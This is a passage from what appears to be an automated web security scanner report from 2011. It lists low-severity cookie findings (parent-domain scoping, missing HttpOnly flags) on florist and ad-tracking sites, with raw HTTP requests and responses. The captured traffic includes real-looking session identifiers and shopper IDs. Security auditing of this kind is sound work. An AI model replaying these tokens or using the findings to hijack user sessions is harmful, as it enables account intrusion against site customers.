Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
12.36. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=39804&partnerID=91&clientID=4744&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; dp_rec="{\"1\": 1304340350+ \"3\": 1304301926+ \"2\": 1304243633+ \"5\": 1304340362+ \"4\": 1304340367}"; partnerUID="eyIzOCI6ICJ1JTNENzUyNzY5MjA0NyUzQXMxJTNEMTMwMzEyMjI5NTgxNSUzQXRzJTNEMTMwNDI4MDI3NzY0NiUzQXMyLjMzJTNEJTJDMjc0MCUyQyIsICIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXSwgIjE5NSI6IFsiMGNiYzVmNWMtZTNlYi1lMTJkLTJjMDYtZWQ3YzQwYjE5ZTkwIiwgdHJ1ZV0sICIxOTEiOiBbIjM3MDY2OTIzNDc1MTUzNTYzNTkiLCB0cnVlXSwgIjc5IjogWyIxNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSIsIHRydWVdLCAiODQiOiBbIlE0emd2bldzOTk5clRTaEIiLCB0cnVlXX0="; subID="{}"; impressions="{\"591275\": [1304301926+ \"Tb4RXwAHNm8K5ovHrlhLbw==\"+ 62899+ 25126+ 2261]+ \"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"591270\": [1304243633+ \"Tb0trgAIvYcK5XcWpVIMAw==\"+ 62896+ 25126+ 11582]+ \"610342\": [1304340532+ \"e4261c72-f3c7-37cd-b374-fe89df8a4a7b\"+ 12203+ 58117+ 4038]+ \"593710\": [1304340527+ \"3fd8060e-86f9-3d78-848d-3cf86700b5f3\"+ 8863+ 40494+ 4038]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]+ \"619680\": [1304542089+ \"3899594795659691748\"+ 4456+ 6017+ 11823]+ \"610341\": [1304340492+ \"7a7364c6-4495-3fd9-9cd1-35e19873ff86\"+ 12208+ 58117+ 4038]}"; camp_freq_p1=eJzjkuFYeZZVgFGi83vbOxYFRo2Tz9vfsRgwWoD5XCIc9w6wCjBJbLnw6y2LAoMGgwGDBQNQ9MpnFqCe9Wiir4CiTBLPFv1AEV0xH2T+5L7TKKI77zMDRWfNX4sQBQBNEijP; io_freq_p1="eJzjEua4GiHAKNH5ve0diwGjBZjmEuZY7yrAJLHlwq+3LAoMGgwGDBYMQMHjgQLMEuvRBLeFArVP7juNIrjXBSg4a/5ahCAAdLEcdQ=="; segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8T8OoJV/tjEJND15BrQSKBAOAD4/P74="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 01:02:39 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 09-May-2011 01:02:19 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuZojOBi4Wj6zwQkm4EkEwcHkNXZwczFzDFRBcic9JQJyJxuDGTO/AFSNQdMzv0BEl4QDGSu3c8IZG4sBjJ37GLk4uLYuY9Z4NDBZe9YgOw9QPb3FduBbBaOve9BCvf7AZkHuxmB5KEjIEOO5gCZx5+ATD0BJk+CzT6dAyTOgeQufAeJXtwLIp9cAGl8sZsZSL7cBxJ5C2a/OwBy8b9woJV/tjEJrH/yDGglUIADAEVAP+s="; Domain=invitemedia.com; expires=Tue, 08-May-2012 01:02:39 GMT; Path=/
Content-Length: 344

makePixelRequest("http://ad.yieldmanager.com/pixel?id=1095653&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script sr
...[SNIP]...
12.37. http://t.p.mybuys.com/webrec/wr.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webrec/wr.do?client=FTD&sessionId=544E1284-8127-56AF-A20F-90F1DFEB835D&ns=1&pt=h&mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3&lang=en&v=4.7.3&mbts=1304902834941&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=9D2A178B4C8160F5F1DD7DA8663002AD; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=wQ4lB1nLaBF6/m4UPcv42F1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 27-May-2079 04:14:44 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>
12.38. http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wa.proflowers.com
Path:   /b/ss/proflodevelopment/1/H.22.1/s82534269827883

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/proflodevelopment/1/H.22.1/s82534269827883?AQB=1&ndh=1&t=9%2F4%2F2011%207%3A8%3A20%201%20300&ns=proflowers1&pageName=PFC%3Ahome%3Ahome&g=http%3A%2F%2Fwww.proflowers.com%2F&cc=USD&ch=PFC%3Ahome&server=PRVD36&c1=PFC%3Ahome%3AHPC&c2=5%3A00AM&c3=Monday&v4=PFC&c5=na%3Ana%3Ana%3Ana&v5=HPC&v7=27&c11=PFC&c12=true&v12=pfb0%3Apku1%3Apkv2%3Apml0%3Apfl0%3A%3A%3Apfe3%3Apec3%3Apem1%3Apmm2%3A%3A%3A%3Appr2%3Axpa1%3Apsr2%3Aapg1%3A&c13=false&c14=true&v22=5%3A00AM&v23=Monday&c28=91621bab-4967-45f8-ad8e-98be730e6e4a&v31=-1&c35=CUS&v35=empty%20code&v39=pvo2%3A%3A%3A%3Apnp3%3Apxa2%3Apxb1%3Apxc1%3A%3A%3Apks3%3Apkt1%3Azzd2%3Azze1%3Aphl2%3Aphr2%3Azzf2%3Axpc1%3A&v49=%3A%3A%3A%3A%3Apbo5%3A%3Appv3%3A%3Anta1%3Antb1%3Antc1%3Antd2%3Ante2%3Apmt3%3A%3Axpb1%3Aprh1%3A&v50=PFC%3AUSA&v52=PFC&c53=D%3Dv53&v53=homepage001&c54=D%3Dv54&v54=pfc_control_050811&c55=D%3Dv55&v55=PFC%3Ahome%3Ahomepage%3Apfc_control_2011-05-07&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&AQE=1 HTTP/1.1
Host: wa.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 12:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi=[CS]v1|26E3EC9C05010F51-40000101E0246B4D[CE]; Expires=Sat, 7 May 2016 12:08:24 GMT; Domain=.proflowers.com; Path=/
Location: http://wa.proflowers.com/b/ss/proflodevelopment/1/H.22.1/s82534269827883?AQB=1&pccr=true&vidn=26E3EC9C05010F51-40000101E0246B4D&&ndh=1&t=9%2F4%2F2011%207%3A8%3A20%201%20300&ns=proflowers1&pageName=PFC%3Ahome%3Ahome&g=http%3A%2F%2Fwww.proflowers.com%2F&cc=USD&ch=PFC%3Ahome&server=PRVD36&c1=PFC%3Ahome%3AHPC&c2=5%3A00AM&c3=Monday&v4=PFC&c5=na%3Ana%3Ana%3Ana&v5=HPC&v7=27&c11=PFC&c12=true&v12=pfb0%3Apku1%3Apkv2%3Apml0%3Apfl0%3A%3A%3Apfe3%3Apec3%3Apem1%3Apmm2%3A%3A%3A%3Appr2%3Axpa1%3Apsr2%3Aapg1%3A&c13=false&c14=true&v22=5%3A00AM&v23=Monday&c28=91621bab-4967-45f8-ad8e-98be730e6e4a&v31=-1&c35=CUS&v35=empty%20code&v39=pvo2%3A%3A%3A%3Apnp3%3Apxa2%3Apxb1%3Apxc1%3A%3A%3Apks3%3Apkt1%3Azzd2%3Azze1%3Aphl2%3Aphr2%3Azzf2%3Axpc1%3A&v49=%3A%3A%3A%3A%3Apbo5%3A%3Appv3%3A%3Anta1%3Antb1%3Antc1%3Antd2%3Ante2%3Apmt3%3A%3Axpb1%3Aprh1%3A&v50=PFC%3AUSA&v52=PFC&c53=D%3Dv53&v53=homepage001&c54=D%3Dv54&v54=pfc_control_050811&c55=D%3Dv55&v55=PFC%3Ahome%3Ahomepage%3Apfc_control_2011-05-07&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1066&bh=968&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 12:08:24 GMT
Last-Modified: Tue, 10 May 2011 12:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www15
Content-Length: 0
Content-Type: text/plain

12.39. http://www.ftd.com/351  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /351

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /351 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1304902819159; markcode=351; c1=%7B%22referrer_before_redirect%22%3A%22%22%7D

Response

HTTP/1.1 301 Moved Permanently
Server: Apache
Set-Cookie: TLTSID=B6A5C1A479D710790018F9E37C66E2B0; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=B6A5C1A479D710790018F9E37C66E2B0; Path=/; Domain=.ftd.com; expires=Mon, 09-05-2021 01:00:21 GMT
Location: http://www.ftd.com/351/
Content-Type: text/html; charset=iso-8859-1
Content-Length: 350
Date: Mon, 09 May 2011 01:00:21 GMT
X-Varnish: 540312318
Age: 0
Via: 1.1 varnish
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>301 Moved Permanently</TITLE>
</HEAD><BODY>
<H1>Moved Permanently</H1>
The document has moved <A HREF="http://www.ftd.com/351/">h
...[SNIP]...
13. Cookie without HttpOnly flag set  previous  next
There are 57 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

13.1. http://blooms.1800flowers.com/cm  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://blooms.1800flowers.com
Path:   /cm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cm?ci=90074784&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5 HTTP/1.1
Host: blooms.1800flowers.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:00:51 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Set-Cookie: CoreID6=70061304902851067811388; path=/; expires=Fri, 08 May 2026 01:00:51 GMT
Set-Cookie: TestSess3=70061304902851067811388;path=/
Location: /cm?ci=90074784&st=1304902848067&vn1=4.8.3H&ec=utf-8&vn2=e4.0&pi=w-Welcome%20Page&ul=http%3A%2F%2Fww30.1800flowers.com%2F&tid=6&cg=w&rnd=1304912507230&pc=Y&jv=1.5&np0=Shockwave%2520Flash&np1=Java%2520Deployment%2520Toolkit%25206.0.240.7&np2=Java(TM)%2520Platform%2520SE%25206%2520U24&np3=Silverlight%2520Plug-In&np4=Chrome%2520PDF%2520Viewer&np5=Google%2520Gears%25200.5.33.0&np6=WPI%2520Detector%25201.3&np7=Google%2520Update&np8=Default%2520Plug-in&je=y&sw=1920&sh=1200&pd=16&tz=5&cvdone=p
Content-Type: text/plain; charset=UTF-8
Content-Length: 0

13.2. http://t.p.mybuys.com/webrec/wr.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.p.mybuys.com
Path:   /webrec/wr.do

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webrec/wr.do?client=FTD&sessionId=544E1284-8127-56AF-A20F-90F1DFEB835D&ns=1&pt=h&mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3&lang=en&v=4.7.3&mbts=1304902834941&rf=http%3A%2F%2Fwww.ftd.com%2F&purl=http%3A%2F%2Fwww.ftd.com%2F HTTP/1.1
Host: t.p.mybuys.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:00:37 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: JSESSIONID=9D2A178B4C8160F5F1DD7DA8663002AD; Path=/webrec
Set-Cookie: mbc=""; Domain=.mybuys.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mbc=wQ4lB1nLaBF6/m4UPcv42F1XNaZXwyoF; Domain=.mybuys.com; Expires=Sat, 27-May-2079 04:14:44 GMT; Path=/
Vary: Accept-Encoding
P3P: CP="DSP CAO DEVo TAI PSD IVDo IVAo CONo HISo CUR PSA OUR IND NAV COM UNI INT", policyref="/w3c/p3p.xml"
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
x-cdn: Cotendo
Connection: Keep-Alive
Content-Length: 34

<html>
<body>
</body>
</html>
13.3. http://ww30.1800baskets.com/deliverycalendarnew.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /deliverycalendarnew.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /deliverycalendarnew.do?month=5&year=2011&locationType=1&itemCount=1&prodType=GPT&productPrice=29.99&zip=10010&country=&productSKU=93260&contextPageType=PRODUCT&isGeoSell=false&field=deliveryDate&baseCode=93260&nextMonthAvailableCheck=true&page=product HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Origin: http://ww30.1800baskets.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000MKdbdCo70zXsBXxIys-COzm:-1; ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903453756&t4=1304903443093&lti=1304903453755&ln=sd&hr=javascript%3AcheckNShowAppParamLightBoxCalendar%28deliveryDate%2Ctrue%29%3B&fti=&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=&fd=&uer=&fu=&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:13 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00001N288SgFQQcgjdh8LBTc6IT:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 52934


<html>
<head>    
<link rel="stylesheet" type="text/css" href="http://media1.1800flowers.com/800f_assets/jet/website/styles/baskets/flowers_enterprise_apr1.css"/>

<script type="text
...[SNIP]...
13.4. http://ww30.1800baskets.com/include/cookieCloner.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /include/cookieCloner.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /include/cookieCloner.asp?tablink=true&redirecturl=template.do?id=template3&page=2000&persistent=847b741e4593439b8e3ed6040ba46630&shopperid=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618&brandCode=1001&banner= HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 01:15:57 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Location: http://ww30.1800baskets.com/template.do?id=template3&page=2000
Content-Length: 0
Set-Cookie: JSESSIONID=0000s_k0fIDZcMvgOtLcaDZHOiR:-1; Path=/
Set-Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; Expires=Thu, 06-May-21 01:15:56 GMT; Path=/; Domain=1800baskets.com
Set-Cookie: FSESSIONID=847b741e4593439b8e3ed6040ba46630; Path=/; Domain=1800baskets.com
Set-Cookie: brandCode=1001; Path=/; Domain=1800baskets.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/plain
Content-Language: en-US

13.5. http://ww30.1800baskets.com/shoppingbasket.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /shoppingbasket.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /shoppingbasket.do HTTP/1.1
Host: ww30.1800baskets.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800baskets.com/product.do?baseCode=93260&dataset=11309
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ShopperManagerEnterprise=aed35ad7-54a3-48bc-a8e0-0c9f3d76e618; FSESSIONID=847b741e4593439b8e3ed6040ba46630; brandCode=1001; __utmz=1.1304903358.1.1.utmcsr=ww30.1800flowers.com|utmccn=(referral)|utmcmd=referral|utmcct=/collection.do; cmTPSet=Y; CMAVID=70091303843240316067555; __unam=bbc31a8-12fd24e67c1-26d7039-1; __utma=1.534657557.1304903358.1304903358.1304903358.1; __utmc=1; __utmb=1.2.10.1304903358; 87011923-VID=16601209214853; 87011923-SKEY=6825682268674136395; HumanClickSiteContainerID_87011923=STANDALONE; CoreAt=90074784=1|2|0|0|0|0|0|1|0|0|0|0|1|1304903358|1_|1561_&; cmRS=&t1=1304903446336&t2=1304903453532&t3=1304903458838&t4=1304903443093&lti=1304903458838&ln=verify&hr=javascript%3AcheckNSubmit%28false%29&fti=1304903458845&fn=searchform%3A0%3BproductForm%3A1%3Bsigninform%3A2%3Bfindgiftform%3A3%3BUNDEFINED%3A4%3B&ac=1:S&fd=1%3A22%3AlocationCode%3B&uer=&fu=/product.do&pi=PRODUCT%3A%20The%20Popcorn%20Factory%20Party%20Pup%20Snack%20Tin%20%2893260%29&ho=blooms.1800flowers.com/cm%3F&ci=90074784; JSESSIONID=0000a4jGFqAQQsPqkpo4AlBHArV:-1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:18:26 GMT
Server: IBM_HTTP_Server
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAa IVDa CONo HISa TELo OUR DELa SAMo UNRo OTRo IND UNI NAV"
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000elBrn4hw6Blclz2pBq53Rgi:-1; Path=/
Vary: Accept-Encoding
X-Powered-By: 1800Flowers web server
X-AspNet-Version: 1.21.366
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 146143


           <html>
<head>

   <meta http-equiv="Pragma" content="no-cache">
   <meta http-equiv="Cache-Control" content="no-cache">
   <meta http-equiv="Expir
...[SNIP]...
13.6. http://ww30.1800baskets.com/template.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://ww30.1800baskets.com
Path:   /template.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

